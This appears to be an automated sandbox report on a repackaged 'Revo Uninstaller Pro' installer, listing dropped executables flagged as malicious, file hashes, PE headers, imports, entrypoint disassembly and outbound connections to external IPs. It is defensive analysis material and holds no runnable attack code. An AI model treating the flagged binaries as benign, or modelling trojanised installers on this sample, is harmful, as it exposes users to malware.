                                                                                                                                            Preview:L..................F.... ....<..vD..c*..XJ...<..vD...B...........................P.O. .:i.....+00.../C:\.....................1......Y...PROGRA~1..t......O.I.Y.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....d.1......Y...VSREVO~1..L......Y.Y......(........................V.S. .R.e.v.o. .G.r.o.u.p.....r.1......Y...REVOUN~1..Z......Y.Y......(....................U. .R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r. .P.r.o.....l.2..B...Y@' .REVOUN~2.EXE..P......Y@'.Y......(........................R.e.v.o.U.n.i.n.P.r.o...e.x.e.......r...............-.......q.............9......C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe..I.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.V.S. .R.e.v.o. .G.r.o.u.p.\.R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r. .P.r.o.\.R.e.v.o.U.n.i.n.P.r.o...e.x.e.3.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.V.S. .R.e.v.o. .G.r.o.u.p.\.R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r. .P.r.o.`.......X.......992547...........hT..CrF.f4...
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe
                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2227280
                                                                                                                                            Entropy (8bit):7.916292078000363
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:49152:2VAbw0dQH5x+E1Q9AA06OT9S7+rICzXNagRt532Z8JtX:yAJdi3+ZN06+Nzdn5w8n
                                                                                                                                            MD5:43D37A6E0FE6E9824DFD80221E6AAD13
                                                                                                                                            SHA1:C0413529476272EF942F5CE48187974C060E5DFF
                                                                                                                                            SHA-256:6C7EC72B5223501E376688CECE1DFADDA6DE77209F15439945129B7F5428D4B0
                                                                                                                                            SHA-512:37FB9001682974DF2E2DF02C1362C96AF42BE933AB1F714E3737D1E7280F789778C54E4A11651F94993617F0742826376CB76507158F8E5B49655EA9C5D9EB73
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......N....m...m...m..A....m..A....m...._m.....m.....m..A....m..A....m...m...m....\m....X..m...m0..m.....m..Rich.m..........PE..L.....if...............'..........................@..................................."...@.................................H...d.......p.............!..+.......1...C...............................C..@...............0............................text............................... ..`.rdata..z...........................@..@.data....K..........................@....rsrc...p...........................@..@.reloc...1.......2..................@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                                            Process:C:\Windows\System32\rundll32.exe
                                                                                                                                            File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):38400
                                                                                                                                            Entropy (8bit):6.303083119559888
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:A1uOPkxgu01UuLjQL1nHSSdW7W0fz1Qp33u43gf:AQqk7HL1nO/Qtrgf
                                                                                                                                            MD5:EC8E58E6B58B4FCDE77431CDA3A24C0E
                                                                                                                                            SHA1:EBB474009B2A2FBCE648ADFF4B8B797FCD00C997
                                                                                                                                            SHA-256:25667717BF4691957F07A6363585E2C7EAF22E5FD7229BF32C91EA59EF4A2EDD
                                                                                                                                            SHA-512:E2C667EBE97973FF27C1EDF3E45EBF7950BC8D7AAD1126DA25290A2F590B21808654694CBE6A0AD1D3649566EC7645EB6B3379C7D7C0A650D5381A69E9CDADE4
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...................p....k...........................................Rich....................PE..d...:.._.........."......T...2.................@....................................o^....`A...................................................P....................r...$......D...hR..8............................R...............P...............................text....:.......<.................. ..h.rdata..l....P.......@..............@..H.data........`.......L..............@....pdata...............N..............@..HPAGE....G............R.............. ..`INIT.................\.............. ..bINIT....@............j..............@....rsrc................l..............@..B.reloc..D............p..............@..B........................................................................................................................................
                                                                                                                                            Process:C:\Windows\System32\rundll32.exe
                                                                                                                                            File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):38400
                                                                                                                                            Entropy (8bit):6.303083119559888
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:A1uOPkxgu01UuLjQL1nHSSdW7W0fz1Qp33u43gf:AQqk7HL1nO/Qtrgf
                                                                                                                                            MD5:EC8E58E6B58B4FCDE77431CDA3A24C0E
                                                                                                                                            SHA1:EBB474009B2A2FBCE648ADFF4B8B797FCD00C997
                                                                                                                                            SHA-256:25667717BF4691957F07A6363585E2C7EAF22E5FD7229BF32C91EA59EF4A2EDD
                                                                                                                                            SHA-512:E2C667EBE97973FF27C1EDF3E45EBF7950BC8D7AAD1126DA25290A2F590B21808654694CBE6A0AD1D3649566EC7645EB6B3379C7D7C0A650D5381A69E9CDADE4
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...................p....k...........................................Rich....................PE..d...:.._.........."......T...2.................@....................................o^....`A...................................................P....................r...$......D...hR..8............................R...............P...............................text....:.......<.................. ..h.rdata..l....P.......@..............@..H.data........`.......L..............@....pdata...............N..............@..HPAGE....G............R.............. ..`INIT.................\.............. ..bINIT....@............j..............@....rsrc................l..............@..B.reloc..D............p..............@..B........................................................................................................................................
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):32
                                                                                                                                            Entropy (8bit):3.4772170014624826
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:alXtRBXFIvCOt:aldTXFcz
                                                                                                                                            MD5:B8F4AE17649F67195291A85DE16B561D
                                                                                                                                            SHA1:1800356941EAFADF247EA9932A02FFEC6C4E4B4C
                                                                                                                                            SHA-256:0FD98AA12C34794DABD32375F4B14B207D4840359AB571D278D2ED490BDDE75A
                                                                                                                                            SHA-512:F640756A1233CC9596AA273C2A4A0296D7F87788486956F8319C4521F27957201DCBA805A7D994B3EAA12249645D5A4B28134C91FE3A4062891612115A941DAC
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:........:Installer message:.....
                                                                                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                            Entropy (8bit):7.999566849269054
                                                                                                                                            TrID:
                                                                                                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                            File name:Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                            File size:22'221'229 bytes
                                                                                                                                            MD5:881464f03502d44e29e5fea8b4c35538
                                                                                                                                            SHA1:8d2337cd5d72f43415e1d8ffb352a85d3374dd1c
                                                                                                                                            SHA256:2a789deb64dd90261f2833d4da0d9f617f2a37ce49ecfa085f5dd43725795a1f
                                                                                                                                            SHA512:11db58ebb0f053721c2f4125fa60503a860df5aca55db942608aa42266d07904f5d0f595e34d746370bc9391014b34813c24fb2b2d904c12b1840d97fd4c6479
                                                                                                                                            SSDEEP:393216:ErPY1+m1GCcgxv4sV3krTPLt3kkNmE3SgH4J2Nd7R4mPJi5nwMEFAEcd7TJPYItE:ErGcgxwsVATPL9nm4H4kNgkFKnHQrrR
                                                                                                                                            TLSH:A527335E911031E4EB528BF0FBB6DE6452EF2022C6F07D5F2C55779ED48049AAEA4C0B
                                                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1 ..PN..PN..PN.*_...PN..PO.JPN.*_...PN..s~..PN..VH..PN.Rich.PN.........................PE..L..."D.f.................h...J...@.
                                                                                                                                            Icon Hash:492da5c5a55ad676
                                                                                                                                            Entrypoint:0x403665
                                                                                                                                            Entrypoint Section:.text
                                                                                                                                            Digitally signed:false
                                                                                                                                            Imagebase:0x400000
                                                                                                                                            Subsystem:windows gui
                                                                                                                                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                            Time Stamp:0x66084422 [Sat Mar 30 16:56:02 2024 UTC]
                                                                                                                                            TLS Callbacks:
                                                                                                                                            CLR (.Net) Version:
                                                                                                                                            OS Version Major:4
                                                                                                                                            OS Version Minor:0
                                                                                                                                            File Version Major:4
                                                                                                                                            File Version Minor:0
                                                                                                                                            Subsystem Version Major:4
                                                                                                                                            Subsystem Version Minor:0
                                                                                                                                            Import Hash:9dda1a1d1f8a1d13ae0297b47046b26e
                                                                                                                                            Instruction
                                                                                                                                            sub esp, 000003F8h
                                                                                                                                            push ebp
                                                                                                                                            push esi
                                                                                                                                            push edi
                                                                                                                                            push 00000020h
                                                                                                                                            pop edi
                                                                                                                                            xor ebp, ebp
                                                                                                                                            push 00008001h
                                                                                                                                            mov dword ptr [esp+20h], ebp
                                                                                                                                            mov dword ptr [esp+18h], 0040A230h
                                                                                                                                            mov dword ptr [esp+14h], ebp
                                                                                                                                            call dword ptr [004080A0h]
                                                                                                                                            mov esi, dword ptr [004080A4h]
                                                                                                                                            lea eax, dword ptr [esp+34h]
                                                                                                                                            push eax
                                                                                                                                            mov dword ptr [esp+4Ch], ebp
                                                                                                                                            mov dword ptr [esp+0000014Ch], ebp
                                                                                                                                            mov dword ptr [esp+00000150h], ebp
                                                                                                                                            mov dword ptr [esp+38h], 0000011Ch
                                                                                                                                            call esi
                                                                                                                                            test eax, eax
                                                                                                                                            jne 00007F37DD1F287Ah
                                                                                                                                            lea eax, dword ptr [esp+34h]
                                                                                                                                            mov dword ptr [esp+34h], 00000114h
                                                                                                                                            push eax
                                                                                                                                            call esi
                                                                                                                                            mov ax, word ptr [esp+48h]
                                                                                                                                            mov ecx, dword ptr [esp+62h]
                                                                                                                                            sub ax, 00000053h
                                                                                                                                            add ecx, FFFFFFD0h
                                                                                                                                            neg ax
                                                                                                                                            sbb eax, eax
                                                                                                                                            mov byte ptr [esp+0000014Eh], 00000004h
                                                                                                                                            not eax
                                                                                                                                            and eax, ecx
                                                                                                                                            mov word ptr [esp+00000148h], ax
                                                                                                                                            cmp dword ptr [esp+38h], 0Ah
                                                                                                                                            jnc 00007F37DD1F2848h
                                                                                                                                            and word ptr [esp+42h], 0000h
                                                                                                                                            mov eax, dword ptr [esp+40h]
                                                                                                                                            movzx ecx, byte ptr [esp+3Ch]
                                                                                                                                            mov dword ptr [0046C318h], eax
                                                                                                                                            xor eax, eax
                                                                                                                                            mov ah, byte ptr [esp+38h]
                                                                                                                                            movzx eax, ax
                                                                                                                                            or eax, ecx
                                                                                                                                            xor ecx, ecx
                                                                                                                                            mov ch, byte ptr [esp+00000148h]
                                                                                                                                            movzx ecx, cx
                                                                                                                                            shl eax, 10h
                                                                                                                                            or eax, ecx
                                                                                                                                            movzx ecx, byte ptr [esp+0000004Eh]
                                                                                                                                            Programming Language:
                                                                                                                                            • [EXP] VC++ 6.0 SP5 build 8804
                                                                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x84fc0xa0.rdata
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x1790000x1a3c8.rsrc
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x80000x2a8.rdata
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                            .text0x10000x66d70x6800179c19d526cb45e37f19e2e748c03470False0.6618088942307693data6.443211282113973IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                            .rdata0x80000x13580x1400bd82d08a08da8783923a22b467699302False0.4431640625data5.103358601944578IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                            .data0xa0000x623780x60011e66ee9873a378c86020f9b7ffc48f2False0.509765625data4.120231668410469IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                            .ndata0x6d0000x10c0000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                            .rsrc0x1790000x1a3c80x1a400f5b854e8e43a68f60abf87a5e757a321False0.690141369047619data6.5935216467364866IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                            RT_ICON0x1794a80xcd42PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9968789251322651
                                                                                                                                            RT_ICON0x1861f00x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.3778932451582428
                                                                                                                                            RT_ICON0x18a4180x3228Device independent bitmap graphic, 64 x 128 x 24, image size 12800EnglishUnited States0.3514797507788162
                                                                                                                                            RT_ICON0x18d6400x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.4713692946058091
                                                                                                                                            RT_ICON0x18fbe80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.5079737335834896
                                                                                                                                            RT_ICON0x190c900xca8Device independent bitmap graphic, 32 x 64 x 24, image size 3200EnglishUnited States0.4762345679012346
                                                                                                                                            RT_ICON0x1919380x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.6693262411347518
                                                                                                                                            RT_ICON0x191da00x2e8dataEnglishUnited States0.020161290322580645
                                                                                                                                            RT_ICON0x1920880x128dataEnglishUnited States0.04391891891891892
                                                                                                                                            RT_DIALOG0x1921b00x114dataEnglishUnited States0.5072463768115942
                                                                                                                                            RT_DIALOG0x1922c80x1f4dataEnglishUnited States0.388
                                                                                                                                            RT_DIALOG0x1924c00xecdataEnglishUnited States0.6228813559322034
                                                                                                                                            RT_DIALOG0x1925b00x94dataEnglishUnited States0.5945945945945946
                                                                                                                                            RT_DIALOG0x1926480xe2dataEnglishUnited States0.6371681415929203
                                                                                                                                            RT_DIALOG0x1927300x114dataEnglishUnited States0.5362318840579711
                                                                                                                                            RT_DIALOG0x1928480x1f4dataEnglishUnited States0.398
                                                                                                                                            RT_DIALOG0x192a400xecdataEnglishUnited States0.6567796610169492
                                                                                                                                            RT_DIALOG0x192b300x94dataEnglishUnited States0.668918918918919
                                                                                                                                            RT_DIALOG0x192bc80xe2dataEnglishUnited States0.668141592920354
                                                                                                                                            RT_GROUP_ICON0x192cb00x84dataEnglishUnited States0.6212121212121212
                                                                                                                                            RT_VERSION0x192d380x260dataEnglishUnited States0.4819078947368421
                                                                                                                                            RT_MANIFEST0x192f980x42eXML 1.0 document, ASCII text, with very long lines (1070), with no line terminatorsEnglishUnited States0.5130841121495328
                                                                                                                                            DLLImport
                                                                                                                                            ADVAPI32.dllRegEnumValueW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, RegOpenKeyExW, RegCreateKeyExW
                                                                                                                                            SHELL32.dllSHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW, ShellExecuteExW
                                                                                                                                            ole32.dllCoCreateInstance, OleUninitialize, OleInitialize, IIDFromString, CoTaskMemFree
                                                                                                                                            COMCTL32.dllImageList_Destroy, ImageList_AddMasked, ImageList_Create
                                                                                                                                            USER32.dllMessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, CreatePopupMenu, AppendMenuW, TrackPopupMenu, OpenClipboard, EmptyClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, IsWindowEnabled, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CharPrevW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, CharNextA, wsprintfA, DispatchMessageW, CreateWindowExW, PeekMessageW, GetSystemMetrics
                                                                                                                                            GDI32.dllGetDeviceCaps, SetBkColor, SelectObject, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor
                                                                                                                                            KERNEL32.dllRemoveDirectoryW, lstrcmpiA, GetTempFileNameW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, WriteFile, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, CreateFileW, GetTickCount, Sleep, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, MulDiv, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, CopyFileW
                                                                                                                                            Language of compilation systemCountry where language is spokenMap
                                                                                                                                            EnglishUnited States
                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                            Dec 9, 2024 17:39:31.607538939 CET49709443192.168.2.9104.20.4.235
                                                                                                                                            Dec 9, 2024 17:39:31.607585907 CET44349709104.20.4.235192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:31.607645035 CET49709443192.168.2.9104.20.4.235
                                                                                                                                            Dec 9, 2024 17:39:31.623399019 CET49709443192.168.2.9104.20.4.235
                                                                                                                                            Dec 9, 2024 17:39:31.623420000 CET44349709104.20.4.235192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:32.841527939 CET44349709104.20.4.235192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:32.841595888 CET49709443192.168.2.9104.20.4.235
                                                                                                                                            Dec 9, 2024 17:39:33.170504093 CET49709443192.168.2.9104.20.4.235
                                                                                                                                            Dec 9, 2024 17:39:33.170541048 CET44349709104.20.4.235192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:33.170870066 CET44349709104.20.4.235192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:33.170972109 CET49709443192.168.2.9104.20.4.235
                                                                                                                                            Dec 9, 2024 17:39:33.174290895 CET49709443192.168.2.9104.20.4.235
                                                                                                                                            Dec 9, 2024 17:39:33.215329885 CET44349709104.20.4.235192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:33.883579016 CET44349709104.20.4.235192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:33.883641958 CET49709443192.168.2.9104.20.4.235
                                                                                                                                            Dec 9, 2024 17:39:33.883652925 CET44349709104.20.4.235192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:33.883665085 CET44349709104.20.4.235192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:33.883692026 CET49709443192.168.2.9104.20.4.235
                                                                                                                                            Dec 9, 2024 17:39:33.883718967 CET49709443192.168.2.9104.20.4.235
                                                                                                                                            Dec 9, 2024 17:39:33.892066956 CET49709443192.168.2.9104.20.4.235
                                                                                                                                            Dec 9, 2024 17:39:33.892086983 CET44349709104.20.4.235192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:34.197745085 CET49710443192.168.2.9194.87.189.43
                                                                                                                                            Dec 9, 2024 17:39:34.197789907 CET44349710194.87.189.43192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:34.198488951 CET49710443192.168.2.9194.87.189.43
                                                                                                                                            Dec 9, 2024 17:39:34.198918104 CET49710443192.168.2.9194.87.189.43
                                                                                                                                            Dec 9, 2024 17:39:34.198935032 CET44349710194.87.189.43192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:35.581202984 CET44349710194.87.189.43192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:35.581903934 CET49710443192.168.2.9194.87.189.43
                                                                                                                                            Dec 9, 2024 17:39:35.817842960 CET49710443192.168.2.9194.87.189.43
                                                                                                                                            Dec 9, 2024 17:39:35.817869902 CET44349710194.87.189.43192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:35.818197966 CET44349710194.87.189.43192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:35.818520069 CET49710443192.168.2.9194.87.189.43
                                                                                                                                            Dec 9, 2024 17:39:35.821532011 CET49710443192.168.2.9194.87.189.43
                                                                                                                                            Dec 9, 2024 17:39:35.867331982 CET44349710194.87.189.43192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:36.259238958 CET44349710194.87.189.43192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:36.259268045 CET44349710194.87.189.43192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:36.259309053 CET49710443192.168.2.9194.87.189.43
                                                                                                                                            Dec 9, 2024 17:39:36.259325027 CET44349710194.87.189.43192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:36.259344101 CET44349710194.87.189.43192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:36.259356976 CET49710443192.168.2.9194.87.189.43
                                                                                                                                            Dec 9, 2024 17:39:36.259361982 CET44349710194.87.189.43192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:36.259381056 CET49710443192.168.2.9194.87.189.43
                                                                                                                                            Dec 9, 2024 17:39:36.259397984 CET49710443192.168.2.9194.87.189.43
                                                                                                                                            Dec 9, 2024 17:39:36.452569962 CET44349710194.87.189.43192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:36.452600956 CET44349710194.87.189.43192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:36.452687979 CET49710443192.168.2.9194.87.189.43
                                                                                                                                            Dec 9, 2024 17:39:36.452713013 CET44349710194.87.189.43192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:36.452758074 CET49710443192.168.2.9194.87.189.43
                                                                                                                                            Dec 9, 2024 17:39:36.488480091 CET44349710194.87.189.43192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:36.488507986 CET44349710194.87.189.43192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:36.488599062 CET49710443192.168.2.9194.87.189.43
                                                                                                                                            Dec 9, 2024 17:39:36.488610983 CET44349710194.87.189.43192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:36.488668919 CET49710443192.168.2.9194.87.189.43
                                                                                                                                            Dec 9, 2024 17:39:36.881782055 CET44349710194.87.189.43192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:36.881798983 CET44349710194.87.189.43192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:36.881839037 CET44349710194.87.189.43192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:36.881865978 CET49710443192.168.2.9194.87.189.43
                                                                                                                                            Dec 9, 2024 17:39:36.881889105 CET44349710194.87.189.43192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:36.881905079 CET49710443192.168.2.9194.87.189.43
                                                                                                                                            Dec 9, 2024 17:39:36.881927013 CET49710443192.168.2.9194.87.189.43
                                                                                                                                            Dec 9, 2024 17:39:36.882956028 CET44349710194.87.189.43192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:36.882973909 CET44349710194.87.189.43192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:36.883017063 CET49710443192.168.2.9194.87.189.43
                                                                                                                                            Dec 9, 2024 17:39:36.883023977 CET44349710194.87.189.43192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:36.883064985 CET49710443192.168.2.9194.87.189.43
                                                                                                                                            Dec 9, 2024 17:39:36.884838104 CET44349710194.87.189.43192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:36.884861946 CET44349710194.87.189.43192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:36.884907961 CET49710443192.168.2.9194.87.189.43
                                                                                                                                            Dec 9, 2024 17:39:36.884913921 CET44349710194.87.189.43192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:36.884937048 CET49710443192.168.2.9194.87.189.43
                                                                                                                                            Dec 9, 2024 17:39:36.884959936 CET49710443192.168.2.9194.87.189.43
                                                                                                                                            Dec 9, 2024 17:39:36.890520096 CET44349710194.87.189.43192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:36.890543938 CET44349710194.87.189.43192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:36.890613079 CET49710443192.168.2.9194.87.189.43
                                                                                                                                            Dec 9, 2024 17:39:36.890619040 CET44349710194.87.189.43192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:36.890685081 CET49710443192.168.2.9194.87.189.43
                                                                                                                                            Dec 9, 2024 17:39:36.900399923 CET44349710194.87.189.43192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:36.900424004 CET44349710194.87.189.43192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:36.900470972 CET49710443192.168.2.9194.87.189.43
                                                                                                                                            Dec 9, 2024 17:39:36.900480032 CET44349710194.87.189.43192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:36.900521994 CET49710443192.168.2.9194.87.189.43
                                                                                                                                            Dec 9, 2024 17:39:36.900528908 CET49710443192.168.2.9194.87.189.43
                                                                                                                                            Dec 9, 2024 17:39:37.012783051 CET44349710194.87.189.43192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:37.012809038 CET44349710194.87.189.43192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:37.012854099 CET49710443192.168.2.9194.87.189.43
                                                                                                                                            Dec 9, 2024 17:39:37.012876987 CET44349710194.87.189.43192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:37.012897015 CET49710443192.168.2.9194.87.189.43
                                                                                                                                            Dec 9, 2024 17:39:37.012921095 CET49710443192.168.2.9194.87.189.43
                                                                                                                                            Dec 9, 2024 17:39:37.032671928 CET44349710194.87.189.43192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:37.032701015 CET44349710194.87.189.43192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:37.032772064 CET49710443192.168.2.9194.87.189.43
                                                                                                                                            Dec 9, 2024 17:39:37.032785892 CET44349710194.87.189.43192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:37.032815933 CET49710443192.168.2.9194.87.189.43
                                                                                                                                            Dec 9, 2024 17:39:37.032828093 CET49710443192.168.2.9194.87.189.43
                                                                                                                                            Dec 9, 2024 17:39:37.052681923 CET44349710194.87.189.43192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:37.052711010 CET44349710194.87.189.43192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:37.052789927 CET49710443192.168.2.9194.87.189.43
                                                                                                                                            Dec 9, 2024 17:39:37.052805901 CET44349710194.87.189.43192.168.2.9
                                                                                                                                            Dec 9, 2024 17:39:37.052850962 CET49710443192.168.2.9194.87.189.43
                                                                                                                                            Dec 9, 2024 17:39:37.074527025 CET44349710194.87.189.43192.168.2.9
